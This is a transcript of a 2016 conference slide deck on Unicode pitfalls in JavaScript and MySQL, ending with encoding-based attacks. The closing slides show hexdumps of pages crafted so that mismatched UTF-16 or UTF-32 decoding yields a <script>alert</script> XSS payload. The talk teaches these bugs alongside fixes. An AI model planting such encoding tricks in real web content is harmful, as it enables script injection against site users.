Hacking with Unicode in 2016

Hacking with Unicode in 2016

This presentation explores common mistakes made by programmers when dealing with Unicode support and character encodings on the Web. For each mistake, I explain how to fix/prevent it, but also how it could possibly be exploited.

#ruhrsec

Video: https://www.youtube.com/watch?v=HhIEDWmQS3w

24e08a9ea84deb17ae121074d0f17125?s=128

Mathias Bynens

April 29, 2016
Tweet

Transcript

  1. @mathias · #ruhrsec Hacking with Unicode

  2. @mathias

  3. 1. Unicode 2. Encodings for Unicode 3. Unicode in JavaScript

    4. Unicode in MySQL 5. Hacking with Unicode What we’ll cover
  4. 1. Unicode

  5. code point unique name symbol/glyph

  6. A LATIN CAPITAL LETTER A U+0041

  7. a LATIN SMALL LETTER A U+0061

  8. © COPYRIGHT SIGN U+00A9

  9. ‚ SNOWMAN U+2603

  10. PILE OF POO U+1F4A9 !

  11. U+000000 → U+10FFFF

  12. (0x10FFFF + 1) code points ↓ 17 planes (0xFFFF +

    1) code points each
  13. Unicode plane #1 U+0000 → U+FFFF Basic Multilingual Plane a.k.a.

    BMP
  14. Unicode planes #2-17 U+010000 → U+10FFFF supplementary planes astral planes

  15. 2. Encodings

  16. Code point range UTF-8 UTF-16 UTF-32 UTF-EBCDIC GB 18030 U+000000

    – U+00007F 1 2 4 1 1 U+000080 – U+00009F 2 2 for characters inherited from GB 2312/GBK (e.g. most Chinese characters); 4 for everything else U+0000A0 – U+0003FF 2 U+000400 – U+0007FF 3 U+000800 – U+003FFF 3 U+004000 – U+00FFFF 4 U+010000 – U+03FFFF 4 4 4 U+040000 – U+10FFFF 5 Number of bytes per code point
  17. Code point range UTF-8 UTF-16 UTF-32 UTF-EBCDIC GB 18030 U+000000

    – U+00007F 1 2 4 1 1 U+000080 – U+00009F 2 2 for characters inherited from GB 2312/GBK (e.g. most Chinese characters); 4 for everything else U+0000A0 – U+0003FF 2 U+000400 – U+0007FF 3 U+000800 – U+003FFF 3 U+004000 – U+00FFFF 4 U+010000 – U+03FFFF 4 4 4 U+040000 – U+10FFFF 5 Number of bytes per code point
  18. 3. JavaScript " Unicode https://mths.be/jsu

  19. Hexadecimal escape sequences >> '\x41\x42\x43' 'ABC' >> '\xA9 Caf\xE9 XYZ'

    '© Café XYZ' can be used for U+0000 → U+00FF
  20. Unicode escape sequences >> '\u0041\u0042\u0043' 'ABC' >> 'I \u2661 JavaScript!'

    'I ὑ JavaScript!' can be used for U+0000 → U+FFFF
  21. …what about astral code points?

  22. …what about !? *…and other, equally important astral symbols *

  23. !

  24. Unicode code point escapes >> '\u{41}\u{42}\u{43}' 'ABC' >> '\u{1F4A9}' '!'

    // U+1F4A9 can be used for U+000000 → U+10FFFF ES6
  25. Surrogate pairs >> '\uD83D\uDCA9' '!' // U+1F4A9 can be used

    for U+010000 → U+10FFFF
  26. Surrogate pairs // for astral code points (> 0xFFFF) function

    getSurrogates(codePoint) { var high = Math.floor((codePoint - 0x10000) / 0x400) + 0xD800; var low = (codePoint - 0x10000) % 0x400 + 0xDC00; return [ high, low ]; } function getCodePoint(high, low) { var codePoint = (high - 0xD800) * 0x400 + low - 0xDC00 + 0x10000; return codePoint; } >> getSurrogates(0x1F4A9); // U+1F4A9 is ! [ 0xD83D, 0xDCA9 ] >> getCodePoint(0xD83D, 0xDCA9); 0x1F4A9 https://mths.be/bed
  27. JavaScript string length >> 'A'.length // U+0041 1 >> 'A'

    == '\u0041' true >> 'B'.length // U+0042 1 >> 'B' == '\u0042' true
  28. String length ≠ char count >> '!'.length // U+1D400 2

    >> '!' == '\uD835\uDC00' true >> '"'.length // U+1D401 2 >> '"' == '\uD835\uDC01' true
  29. String length ≠ char count >> '!'.length // U+1F4A9 2

    >> '!' == '\uD83D\uDCA9' true
  30. String length ≠ char count >> '!'.length // U+1F4A9 2

    >> '!' == '\uD83D\uDCA9' true insert obligatory “number two” joke here
  31. Real-world example

  32. Real-world example

  33. None
  34. None
  35. String character count function countSymbols(string) { return punycode.ucs2.decode(string).length; } >>

    countSymbols('A') // U+0041 1 >> countSymbols('!') // U+1D400 1 >> countSymbols('!') // U+1F4A9 1 https://mths.be/punycode
  36. String character count function countSymbols(string) { return Array.from(string).length; } >>

    countSymbols('A') // U+0041 1 >> countSymbols('!') // U+1D400 1 >> countSymbols('!') // U+1F4A9 1 ES6
  37. String character count function countSymbols(string) { return [...string].length; } >>

    countSymbols('A') // U+0041 1 >> countSymbols('!') // U+1D400 1 >> countSymbols('!') // U+1F4A9 1 ES6
  38. JavaScript escape sequences http://mths.be/bmf

  39. If we’re being pedantic… // it’s actually even more complicated:

    >> 'mañana' == 'mañana' false
  40. If we’re being pedantic… // it’s actually even more complicated:

    >> 'mañana' == 'mañana' false >> 'ma\xF1ana' == 'man\u0303ana' false >> 'ma\xF1ana'.length 6 >> 'man\u0303ana'.length 7
  41. function countSymbolsPedantically(string) { // Unicode Normalization, NFC form: var normalized

    = string.normalize('NFC'); // Account for astral symbols / surrogates: return Array.from(normalized).length; } >> countSymbolsPedantically('mañana') // U+00F1 6 >> countSymbolsPedantically('mañana') // U+006E + U+0303 6 Unicode normalization http://git.io/unorm ES6
  42. Perfect? >> var zalgo = 'H ̹̙̦̮͉̩̗̗ ͧ̇̏̊̾ Eͨ͆͒̆ͮ̃ ͏̷̮̣̫̤̣

    ̵̞̹̻ ̀̉̓ͬ͑͡ ͅ Cͯ̂͐ ͏̨̛͔̦̟͈̻ O ̜͎͍͙͚̬̝̣ ̽ͮ͐͗̀ͤ̍̀ ͢ M ̴̡̲̭͍͇̼̟̯̦ ̉̒͠ Ḛ̛̙̞̪̗ ͥ ͤͩ̾͑̔͐ ͅ Ṯ̴̷̷̗̼͍ ̿̿̓̽͐ H ̙̙ ̔̄ ͜ ';
  43. Perfect? Nope. → can be ‘fixed’ using epic regex-fu >>

    var zalgo = 'H ̹̙̦̮͉̩̗̗ ͧ̇̏̊̾ Eͨ͆͒̆ͮ̃ ͏̷̮̣̫̤̣ ̵̞̹̻ ̀̉̓ͬ͑͡ ͅ Cͯ̂͐ ͏̨̛͔̦̟͈̻ O ̜͎͍͙͚̬̝̣ ̽ͮ͐͗̀ͤ̍̀ ͢ M ̴̡̲̭͍͇̼̟̯̦ ̉̒͠ Ḛ̛̙̞̪̗ ͥ ͤͩ̾͑̔͐ ͅ Ṯ̴̷̷̗̼͍ ̿̿̓̽͐ H ̙̙ ̔̄ ͜ '; >> countSymbolsPedantically(zalgo) 116 // not 9
  44. Reversing a string in JavaScript // naive solution function reverse(string)

    { return string.split('').reverse().join(''); }
  45. Reversing a string in JavaScript // naive solution function reverse(string)

    { return string.split('').reverse().join(''); } >> reverse('abc') 'cba'
  46. Reversing a string in JavaScript // naive solution function reverse(string)

    { return string.split('').reverse().join(''); } >> reverse('abc') 'cba' >> reverse('mañana') // U+00F1 'anañam'
  47. Reversing a string in JavaScript // naive solution function reverse(string)

    { return string.split('').reverse().join(''); } >> reverse('abc') 'cba' >> reverse('mañana') // U+00F1 'anañam' >> reverse('mañana') // U+006E + U+0303 'anãnam'
  48. Reversing a string in JavaScript // naive solution function reverse(string)

    { return string.split('').reverse().join(''); } >> reverse('abc') 'cba' >> reverse('mañana') // U+00F1 'anañam' >> reverse('mañana') // U+006E + U+0303 'anãnam' >> reverse('!') // U+1F4A9 '��' '\uDCA9\uD83D' // the surrogate pair for !, in the wrong order
  49. “I put my thang down, flip it, and reverse it”

    — Missy ‘Misdemeanor’ Elliot, 2002
  50. Reversing a string in JavaScript // Using the Esrever library

    var reverse = esrever.reverse; >> reverse('abc') 'cba' >> reverse('mañana') // U+00F1 'anañam' >> reverse('mañana') // U+006E + U+0303 'anañam' >> reverse('!') // U+1F4A9 '!' https://mths.be/esrever
  51. Iterate over all symbols in a string function getSymbols(string) {

    var length = string.length; var index = -1; var output = []; var character; var charCode; while (++index < length) { character = string.charAt(index); charCode = character.charCodeAt(0); if (charCode >= 0xD800 && charCode <= 0xDBFF) { // note: this doesn’t account for lone high surrogates output.push(character + string.charAt(++index)); } else { output.push(character); } } return output; } var symbols = getSymbols('! '); symbols.forEach(function(symbol) { assert(symbol == '! '); });
  52. Iterate over all symbols in a string for (const symbol

    of '!') { assert(symbol == '!'); } ES6
  53. This behavior affects other string methods, too.

  54. More string madness •String#fromCharCode •String#charAt •String#substring •String#slice •…anything that involves

    strings •oh, and regular expressions
  55. JavaScript has a Unicode problem https://mths.be/jsu

  56. ! The Pile of Poo Test™ https://mths.be/jsu

  57. ! is the new %00

  58. 4. MySQL " Unicode

  59. CREATE TABLE `table_name` ( `id` INT(11) UNSIGNED NOT NULL AUTO_INCREMENT,

    `column_name` VARCHAR(255) NOT NULL DEFAULT '', PRIMARY KEY (`id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8;
  60. CREATE TABLE `table_name` ( `id` INT(11) UNSIGNED NOT NULL AUTO_INCREMENT,

    `column_name` VARCHAR(255) NOT NULL DEFAULT '', PRIMARY KEY (`id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8;
  61. mysql> UPDATE table_name SET column_name = 'foo!bar' WHERE id =

    9001; Query OK, 1 row affected, 1 warning (0.00 sec) Rows matched: 1 Changed: 1 Warnings: 1 mysql> SHOW WARNINGS; +---------+------+--------------------------------------------+ | Level | Code | Message | +---------+------+--------------------------------------------+ | Warning | 1366 | Incorrect string value: '\xF0\x9F\x92\xA9' | | | | for column 'column_name' at row 1 | +---------+------+--------------------------------------------+ 1 row in set (0.00 sec) mysql> SELECT column_name FROM table_name WHERE id = 9001; +-------------+ | column_name | +-------------+ | foo | +-------------+ 1 row in set (0.00 sec)
  62. mysql> UPDATE table_name SET column_name = 'foo!bar' WHERE id =

    9001; Query OK, 1 row affected, 1 warning (0.00 sec) Rows matched: 1 Changed: 1 Warnings: 1 mysql> SHOW WARNINGS; +---------+------+--------------------------------------------+ | Level | Code | Message | +---------+------+--------------------------------------------+ | Warning | 1366 | Incorrect string value: '\xF0\x9F\x92\xA9' | | | | for column 'column_name' at row 1 | +---------+------+--------------------------------------------+ 1 row in set (0.00 sec) mysql> SELECT column_name FROM table_name WHERE id = 9001; +-------------+ | column_name | +-------------+ | foo | +-------------+ 1 row in set (0.00 sec)
  63. mysql> UPDATE table_name SET column_name = 'foo!bar' WHERE id =

    9001; Query OK, 1 row affected, 1 warning (0.00 sec) Rows matched: 1 Changed: 1 Warnings: 1 mysql> SHOW WARNINGS; +---------+------+--------------------------------------------+ | Level | Code | Message | +---------+------+--------------------------------------------+ | Warning | 1366 | Incorrect string value: '\xF0\x9F\x92\xA9' | | | | for column 'column_name' at row 1 | +---------+------+--------------------------------------------+ 1 row in set (0.00 sec) mysql> SELECT column_name FROM table_name WHERE id = 9001; +-------------+ | column_name | +-------------+ | foo | +-------------+ 1 row in set (0.00 sec)
  64. mysql> UPDATE table_name SET column_name = 'foo!bar' WHERE id =

    9001; Query OK, 1 row affected, 1 warning (0.00 sec) Rows matched: 1 Changed: 1 Warnings: 1 mysql> SHOW WARNINGS; +---------+------+--------------------------------------------+ | Level | Code | Message | +---------+------+--------------------------------------------+ | Warning | 1366 | Incorrect string value: '\xF0\x9F\x92\xA9' | | | | for column 'column_name' at row 1 | +---------+------+--------------------------------------------+ 1 row in set (0.00 sec) mysql> SELECT column_name FROM table_name WHERE id = 9001; +-------------+ | column_name | +-------------+ | foo | +-------------+ 1 row in set (0.00 sec)
  65. mysql> UPDATE table_name SET column_name = 'foo!bar' WHERE id =

    9001; Query OK, 1 row affected, 1 warning (0.00 sec) Rows matched: 1 Changed: 1 Warnings: 1 mysql> SHOW WARNINGS; +---------+------+--------------------------------------------+ | Level | Code | Message | +---------+------+--------------------------------------------+ | Warning | 1366 | Incorrect string value: '\xF0\x9F\x92\xA9' | | | | for column 'column_name' at row 1 | +---------+------+--------------------------------------------+ 1 row in set (0.00 sec) mysql> SELECT column_name FROM table_name WHERE id = 9001; +-------------+ | column_name | +-------------+ | foo | +-------------+ 1 row in set (0.00 sec) ✘
  66. MySQL’s ✌utf8✌

  67. ALTER TABLE `table_name` CONVERT TO CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci;

    https://mths.be/utf8mb4
  68. ALTER TABLE `table_name` CONVERT TO CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci;

    https://mths.be/utf8mb4
  69. mysql> UPDATE table_name SET column_name = 'foo!bar' WHERE id =

    9001; Query OK, 1 row affected (0.00 sec) Rows matched: 1 Changed: 1 Warnings: 0 mysql> SELECT column_name FROM table_name WHERE id = 9001; +-------------+ | column_name | +-------------+ | foo!bar | +-------------+ 1 row in set (0.00 sec) https://mths.be/utf8mb4
  70. mysql> UPDATE table_name SET column_name = 'foo!bar' WHERE id =

    9001; Query OK, 1 row affected (0.00 sec) Rows matched: 1 Changed: 1 Warnings: 0 mysql> SELECT column_name FROM table_name WHERE id = 9001; +-------------+ | column_name | +-------------+ | foo!bar | +-------------+ 1 row in set (0.00 sec) https://mths.be/utf8mb4 ✔
  71. 5. Hacking with Unicode

  72. http://mths.be/brk

  73. $ curl -sL https://mths.be/brk | hexdump -C | tail -n

    19 000002c0 3c 00 70 00 3e 00 48 00 65 00 72 00 65 00 20 00 |<.p.>.H.e.r.e. .| 000002d0 69 00 73 00 20 00 73 00 6f 00 6d 00 65 00 20 00 |i.s. .s.o.m.e. .| 000002e0 6d 00 6f 00 6a 00 69 00 62 00 61 00 6b 00 65 00 |m.o.j.i.b.a.k.e.| 000002f0 2e 00 20 00 54 00 6f 00 20 00 66 00 69 00 78 00 |.. .T.o. .f.i.x.| 00000300 20 00 69 00 74 00 2c 00 20 00 75 00 73 00 65 00 | .i.t.,. .u.s.e.| 00000310 20 00 74 00 68 00 65 00 20 00 63 00 68 00 61 00 | .t.h.e. .c.h.a.| 00000320 72 00 61 00 63 00 74 00 65 00 72 00 20 00 65 00 |r.a.c.t.e.r. .e.| 00000330 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 20 00 |n.c.o.d.i.n.g. .| 00000340 6d 00 65 00 6e 00 75 00 20 00 74 00 6f 00 20 00 |m.e.n.u. .t.o. .| 00000350 63 00 68 00 6f 00 6f 00 73 00 65 00 20 00 61 00 |c.h.o.o.s.e. .a.| 00000360 6e 00 6f 00 74 00 68 00 65 00 72 00 20 00 65 00 |n.o.t.h.e.r. .e.| 00000370 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 2e 00 |n.c.o.d.i.n.g...| 00000380 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 70 00 |<./.p.>.....<.p.| 00000390 3e 00 3c 73 63 72 69 70 74 3e 20 61 6c 65 72 74 |>.<script> alert| 000003a0 28 22 58 53 53 22 29 3b 3c 2f 73 63 72 69 70 74 |("XSS");</script| 000003b0 3e 20 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 |> <./.p.>.....<.| 000003c0 2f 00 62 00 6f 00 64 00 79 00 3e 00 0a 00 3c 00 |/.b.o.d.y.>...<.| 000003d0 2f 00 68 00 74 00 6d 00 6c 00 3e 00 0a 00 0a 00 |/.h.t.m.l.>.....| 000003e0
  74. $ curl -sL https://mths.be/brk | hexdump -C | tail -n

    19 000002c0 3c 00 70 00 3e 00 48 00 65 00 72 00 65 00 20 00 |<.p.>.H.e.r.e. .| 000002d0 69 00 73 00 20 00 73 00 6f 00 6d 00 65 00 20 00 |i.s. .s.o.m.e. .| 000002e0 6d 00 6f 00 6a 00 69 00 62 00 61 00 6b 00 65 00 |m.o.j.i.b.a.k.e.| 000002f0 2e 00 20 00 54 00 6f 00 20 00 66 00 69 00 78 00 |.. .T.o. .f.i.x.| 00000300 20 00 69 00 74 00 2c 00 20 00 75 00 73 00 65 00 | .i.t.,. .u.s.e.| 00000310 20 00 74 00 68 00 65 00 20 00 63 00 68 00 61 00 | .t.h.e. .c.h.a.| 00000320 72 00 61 00 63 00 74 00 65 00 72 00 20 00 65 00 |r.a.c.t.e.r. .e.| 00000330 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 20 00 |n.c.o.d.i.n.g. .| 00000340 6d 00 65 00 6e 00 75 00 20 00 74 00 6f 00 20 00 |m.e.n.u. .t.o. .| 00000350 63 00 68 00 6f 00 6f 00 73 00 65 00 20 00 61 00 |c.h.o.o.s.e. .a.| 00000360 6e 00 6f 00 74 00 68 00 65 00 72 00 20 00 65 00 |n.o.t.h.e.r. .e.| 00000370 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 2e 00 |n.c.o.d.i.n.g...| 00000380 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 70 00 |<./.p.>.....<.p.| 00000390 3e 00 3c 73 63 72 69 70 74 3e 20 61 6c 65 72 74 |>.<script> alert| 000003a0 28 22 58 53 53 22 29 3b 3c 2f 73 63 72 69 70 74 |("XSS");</script| 000003b0 3e 20 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 |> <./.p.>.....<.| 000003c0 2f 00 62 00 6f 00 64 00 79 00 3e 00 0a 00 3c 00 |/.b.o.d.y.>...<.| 000003d0 2f 00 68 00 74 00 6d 00 6c 00 3e 00 0a 00 0a 00 |/.h.t.m.l.>.....| 000003e0
  75. $ curl -sL https://mths.be/brk | hexdump -C | tail -n

    19 000002c0 3c 00 70 00 3e 00 48 00 65 00 72 00 65 00 20 00 |<.p.>.H.e.r.e. .| 000002d0 69 00 73 00 20 00 73 00 6f 00 6d 00 65 00 20 00 |i.s. .s.o.m.e. .| 000002e0 6d 00 6f 00 6a 00 69 00 62 00 61 00 6b 00 65 00 |m.o.j.i.b.a.k.e.| 000002f0 2e 00 20 00 54 00 6f 00 20 00 66 00 69 00 78 00 |.. .T.o. .f.i.x.| 00000300 20 00 69 00 74 00 2c 00 20 00 75 00 73 00 65 00 | .i.t.,. .u.s.e.| 00000310 20 00 74 00 68 00 65 00 20 00 63 00 68 00 61 00 | .t.h.e. .c.h.a.| 00000320 72 00 61 00 63 00 74 00 65 00 72 00 20 00 65 00 |r.a.c.t.e.r. .e.| 00000330 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 20 00 |n.c.o.d.i.n.g. .| 00000340 6d 00 65 00 6e 00 75 00 20 00 74 00 6f 00 20 00 |m.e.n.u. .t.o. .| 00000350 63 00 68 00 6f 00 6f 00 73 00 65 00 20 00 61 00 |c.h.o.o.s.e. .a.| 00000360 6e 00 6f 00 74 00 68 00 65 00 72 00 20 00 65 00 |n.o.t.h.e.r. .e.| 00000370 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 2e 00 |n.c.o.d.i.n.g...| 00000380 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 70 00 |<./.p.>.....<.p.| 00000390 3e 00 3c 73 63 72 69 70 74 3e 20 61 6c 65 72 74 |>.<script> alert| 000003a0 28 22 58 53 53 22 29 3b 3c 2f 73 63 72 69 70 74 |("XSS");</script| 000003b0 3e 20 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 |> <./.p.>.....<.| 000003c0 2f 00 62 00 6f 00 64 00 79 00 3e 00 0a 00 3c 00 |/.b.o.d.y.>...<.| 000003d0 2f 00 68 00 74 00 6d 00 6c 00 3e 00 0a 00 0a 00 |/.h.t.m.l.>.....| 000003e0
  76. $ curl -sL https://mths.be/brk | hexdump -C | tail -n

    19 000002c0 3c 00 70 00 3e 00 48 00 65 00 72 00 65 00 20 00 |<.p.>.H.e.r.e. .| 000002d0 69 00 73 00 20 00 73 00 6f 00 6d 00 65 00 20 00 |i.s. .s.o.m.e. .| 000002e0 6d 00 6f 00 6a 00 69 00 62 00 61 00 6b 00 65 00 |m.o.j.i.b.a.k.e.| 000002f0 2e 00 20 00 54 00 6f 00 20 00 66 00 69 00 78 00 |.. .T.o. .f.i.x.| 00000300 20 00 69 00 74 00 2c 00 20 00 75 00 73 00 65 00 | .i.t.,. .u.s.e.| 00000310 20 00 74 00 68 00 65 00 20 00 63 00 68 00 61 00 | .t.h.e. .c.h.a.| 00000320 72 00 61 00 63 00 74 00 65 00 72 00 20 00 65 00 |r.a.c.t.e.r. .e.| 00000330 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 20 00 |n.c.o.d.i.n.g. .| 00000340 6d 00 65 00 6e 00 75 00 20 00 74 00 6f 00 20 00 |m.e.n.u. .t.o. .| 00000350 63 00 68 00 6f 00 6f 00 73 00 65 00 20 00 61 00 |c.h.o.o.s.e. .a.| 00000360 6e 00 6f 00 74 00 68 00 65 00 72 00 20 00 65 00 |n.o.t.h.e.r. .e.| 00000370 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 2e 00 |n.c.o.d.i.n.g...| 00000380 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 70 00 |<./.p.>.....<.p.| 00000390 3e 00 3c 73 63 72 69 70 74 3e 20 61 6c 65 72 74 |>.<script> alert| 000003a0 28 22 58 53 53 22 29 3b 3c 2f 73 63 72 69 70 74 |("XSS");</script| 000003b0 3e 20 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 |> <./.p.>.....<.| 000003c0 2f 00 62 00 6f 00 64 00 79 00 3e 00 0a 00 3c 00 |/.b.o.d.y.>...<.| 000003d0 2f 00 68 00 74 00 6d 00 6c 00 3e 00 0a 00 0a 00 |/.h.t.m.l.>.....| 000003e0  (U+3C73 CJK UNIFIED IDEOGRAPH-3C73)
  77. $ curl -sL https://mths.be/brk | hexdump -C | tail -n

    19 000002c0 3c 00 70 00 3e 00 48 00 65 00 72 00 65 00 20 00 |<.p.>.H.e.r.e. .| 000002d0 69 00 73 00 20 00 73 00 6f 00 6d 00 65 00 20 00 |i.s. .s.o.m.e. .| 000002e0 6d 00 6f 00 6a 00 69 00 62 00 61 00 6b 00 65 00 |m.o.j.i.b.a.k.e.| 000002f0 2e 00 20 00 54 00 6f 00 20 00 66 00 69 00 78 00 |.. .T.o. .f.i.x.| 00000300 20 00 69 00 74 00 2c 00 20 00 75 00 73 00 65 00 | .i.t.,. .u.s.e.| 00000310 20 00 74 00 68 00 65 00 20 00 63 00 68 00 61 00 | .t.h.e. .c.h.a.| 00000320 72 00 61 00 63 00 74 00 65 00 72 00 20 00 65 00 |r.a.c.t.e.r. .e.| 00000330 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 20 00 |n.c.o.d.i.n.g. .| 00000340 6d 00 65 00 6e 00 75 00 20 00 74 00 6f 00 20 00 |m.e.n.u. .t.o. .| 00000350 63 00 68 00 6f 00 6f 00 73 00 65 00 20 00 61 00 |c.h.o.o.s.e. .a.| 00000360 6e 00 6f 00 74 00 68 00 65 00 72 00 20 00 65 00 |n.o.t.h.e.r. .e.| 00000370 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 2e 00 |n.c.o.d.i.n.g...| 00000380 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 70 00 |<./.p.>.....<.p.| 00000390 3e 00 3c 73 63 72 69 70 74 3e 20 61 6c 65 72 74 |>.<script> alert| 000003a0 28 22 58 53 53 22 29 3b 3c 2f 73 63 72 69 70 74 |("XSS");</script| 000003b0 3e 20 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 |> <./.p.>.....<.| 000003c0 2f 00 62 00 6f 00 64 00 79 00 3e 00 0a 00 3c 00 |/.b.o.d.y.>...<.| 000003d0 2f 00 68 00 74 00 6d 00 6c 00 3e 00 0a 00 0a 00 |/.h.t.m.l.>.....| 000003e0  (U+6372 CJK UNIFIED IDEOGRAPH-6372)
  78. $ curl -sL https://mths.be/brk | hexdump -C | tail -n

    19 000002c0 3c 00 70 00 3e 00 48 00 65 00 72 00 65 00 20 00 |<.p.>.H.e.r.e. .| 000002d0 69 00 73 00 20 00 73 00 6f 00 6d 00 65 00 20 00 |i.s. .s.o.m.e. .| 000002e0 6d 00 6f 00 6a 00 69 00 62 00 61 00 6b 00 65 00 |m.o.j.i.b.a.k.e.| 000002f0 2e 00 20 00 54 00 6f 00 20 00 66 00 69 00 78 00 |.. .T.o. .f.i.x.| 00000300 20 00 69 00 74 00 2c 00 20 00 75 00 73 00 65 00 | .i.t.,. .u.s.e.| 00000310 20 00 74 00 68 00 65 00 20 00 63 00 68 00 61 00 | .t.h.e. .c.h.a.| 00000320 72 00 61 00 63 00 74 00 65 00 72 00 20 00 65 00 |r.a.c.t.e.r. .e.| 00000330 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 20 00 |n.c.o.d.i.n.g. .| 00000340 6d 00 65 00 6e 00 75 00 20 00 74 00 6f 00 20 00 |m.e.n.u. .t.o. .| 00000350 63 00 68 00 6f 00 6f 00 73 00 65 00 20 00 61 00 |c.h.o.o.s.e. .a.| 00000360 6e 00 6f 00 74 00 68 00 65 00 72 00 20 00 65 00 |n.o.t.h.e.r. .e.| 00000370 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 2e 00 |n.c.o.d.i.n.g...| 00000380 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 70 00 |<./.p.>.....<.p.| 00000390 3e 00 3c 73 63 72 69 70 74 3e 20 61 6c 65 72 74 |>.<script> alert| 000003a0 28 22 58 53 53 22 29 3b 3c 2f 73 63 72 69 70 74 |("XSS");</script| 000003b0 3e 20 3c 00 2f 00 70 00 3e 00 0a 00 0a 00 3c 00 |> <./.p.>.....<.| 000003c0 2f 00 62 00 6f 00 64 00 79 00 3e 00 0a 00 3c 00 |/.b.o.d.y.>...<.| 000003d0 2f 00 68 00 74 00 6d 00 6c 00 3e 00 0a 00 0a 00 |/.h.t.m.l.>.....| 000003e0  (U+6970 CJK UNIFIED IDEOGRAPH-6970)
  79. http://mths.be/brm

  80. http://mths.be/brm ∀scriptalert(1)/script

  81. $ hexdump -C utf-32-xss.html 00000000 00 00 22 00 00

    00 3e 00 00 00 3c 00 00 00 00 73 |.."...>...<....s| 00000010 00 00 00 63 00 00 00 72 00 00 00 69 00 00 00 70 |...c...r...i...p| 00000020 00 00 00 74 00 00 3e 00 00 00 00 61 00 00 00 6c |...t..>....a...l| 00000030 00 00 00 65 00 00 00 72 00 00 00 74 00 00 00 28 |...e...r...t...(| 00000040 00 00 00 31 00 00 00 29 00 00 3c 00 00 00 00 2f |...1...)..<..../| 00000050 00 00 00 73 00 00 00 63 00 00 00 72 00 00 00 69 |...s...c...r...i| 00000060 00 00 00 70 00 00 00 74 00 00 3e 00 |...p...t..>.| 0000006c
  82. $ hexdump -C utf-32-xss.html 00000000 00 00 22 00 00

    00 3e 00 00 00 3c 00 00 00 00 73 |.."...>...<....s| 00000010 00 00 00 63 00 00 00 72 00 00 00 69 00 00 00 70 |...c...r...i...p| 00000020 00 00 00 74 00 00 3e 00 00 00 00 61 00 00 00 6c |...t..>....a...l| 00000030 00 00 00 65 00 00 00 72 00 00 00 74 00 00 00 28 |...e...r...t...(| 00000040 00 00 00 31 00 00 00 29 00 00 3c 00 00 00 00 2f |...1...)..<..../| 00000050 00 00 00 73 00 00 00 63 00 00 00 72 00 00 00 69 |...s...c...r...i| 00000060 00 00 00 70 00 00 00 74 00 00 3e 00 |...p...t..>.| 0000006c
  83. $ hexdump -C utf-32-xss.html 00000000 00 00 22 00 00

    00 3e 00 00 00 3c 00 00 00 00 73 |.."...>...<....s| 00000010 00 00 00 63 00 00 00 72 00 00 00 69 00 00 00 70 |...c...r...i...p| 00000020 00 00 00 74 00 00 3e 00 00 00 00 61 00 00 00 6c |...t..>....a...l| 00000030 00 00 00 65 00 00 00 72 00 00 00 74 00 00 00 28 |...e...r...t...(| 00000040 00 00 00 31 00 00 00 29 00 00 3c 00 00 00 00 2f |...1...)..<..../| 00000050 00 00 00 73 00 00 00 63 00 00 00 72 00 00 00 69 |...s...c...r...i| 00000060 00 00 00 70 00 00 00 74 00 00 3e 00 |...p...t..>.| 0000006c ∀ (U+2200 FOR ALL)
  84. $ hexdump -C utf-32-xss.html 00000000 00 00 22 00 00

    00 3e 00 00 00 3c 00 00 00 00 73 |.."...>...<....s| 00000010 00 00 00 63 00 00 00 72 00 00 00 69 00 00 00 70 |...c...r...i...p| 00000020 00 00 00 74 00 00 3e 00 00 00 00 61 00 00 00 6c |...t..>....a...l| 00000030 00 00 00 65 00 00 00 72 00 00 00 74 00 00 00 28 |...e...r...t...(| 00000040 00 00 00 31 00 00 00 29 00 00 3c 00 00 00 00 2f |...1...)..<..../| 00000050 00 00 00 73 00 00 00 63 00 00 00 72 00 00 00 69 |...s...c...r...i| 00000060 00 00 00 70 00 00 00 74 00 00 3e 00 |...p...t..>.| 0000006c  (U+3E00 CJK UNIFIED IDEOGRAPH-3E00)
  85. $ hexdump -C utf-32-xss.html 00000000 00 00 22 00 00

    00 3e 00 00 00 3c 00 00 00 00 73 |.."...>...<....s| 00000010 00 00 00 63 00 00 00 72 00 00 00 69 00 00 00 70 |...c...r...i...p| 00000020 00 00 00 74 00 00 3e 00 00 00 00 61 00 00 00 6c |...t..>....a...l| 00000030 00 00 00 65 00 00 00 72 00 00 00 74 00 00 00 28 |...e...r...t...(| 00000040 00 00 00 31 00 00 00 29 00 00 3c 00 00 00 00 2f |...1...)..<..../| 00000050 00 00 00 73 00 00 00 63 00 00 00 72 00 00 00 69 |...s...c...r...i| 00000060 00 00 00 70 00 00 00 74 00 00 3e 00 |...p...t..>.| 0000006c  (U+3C00 CJK UNIFIED IDEOGRAPH-3C00)
  86. $ hexdump -C utf-32-xss.html 00000000 00 00 22 00 00

